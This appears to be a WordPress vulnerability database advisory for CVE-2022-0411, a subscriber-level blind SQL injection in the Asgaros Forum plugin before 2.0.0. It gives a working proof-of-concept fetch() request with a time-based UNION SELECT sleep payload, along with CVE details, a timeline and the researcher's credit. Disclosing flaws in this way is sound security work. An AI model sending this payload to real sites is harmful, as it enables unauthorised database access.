WordPress Plugin Vulnerabilities

Asgaros Forum < 2.0.0 - Subscriber+ Blind SQL Injection

Description

The plugin does not sanitise and escape the post_id parameter before using it in a SQL statement via a REST route of the plugin (accessible to any authenticated user), leading to a SQL injection

Proof of Concept

As any authenticated user, such as subscriber

To get the nonce: /wp-admin/admin-ajax.php?action=rest-nonce

fetch("?rest_route=/asgaros-forum/v1/reaction/1/hello", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "post_id=1 UNION SELECT 1, 1, 1, 1, 1,2,3,4,5,sleep(5) FROM dual -- g&_wpnonce=59c63b25b1",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

Plugin icon
asgaros-forum
Fixed in 2.0.0

References

CVE
CVE-2022-0411
URL
https://plugins.trac.wordpress.org/changeset/2669226/asgaros-forum

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
7.7 (high)

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
https://kazet.cc/
Verified
Yes
WPVDB ID
35272197-c973-48ad-8405-538bfbafa172

Timeline

Publicly Published
2022-01-31 (about 1 years ago)
Added
2022-01-31 (about 1 years ago)
Last Updated
2022-04-12 (about 1 years ago)

Other

Published
Title
Published
2019-07-25
Title
Blog2Social <= 5.5.0 - SQL Injection
Published
2023-11-07
Title
Who Hit The Page – Hit Counter <= 1.4.14.3 - Authenticated (Administrator+) SQL Injection
Published
2021-12-24
Title
Advanced Custom Fields: Extended < 0.8.8.7 - Admin+ SQL Injection
Published
2017-07-06
Title
DSubscribers <= 1.2 - Authenticated SQL Injection
Published
2014-08-01
Title
WP DS FAQ Plus - Unspecified SQL Injection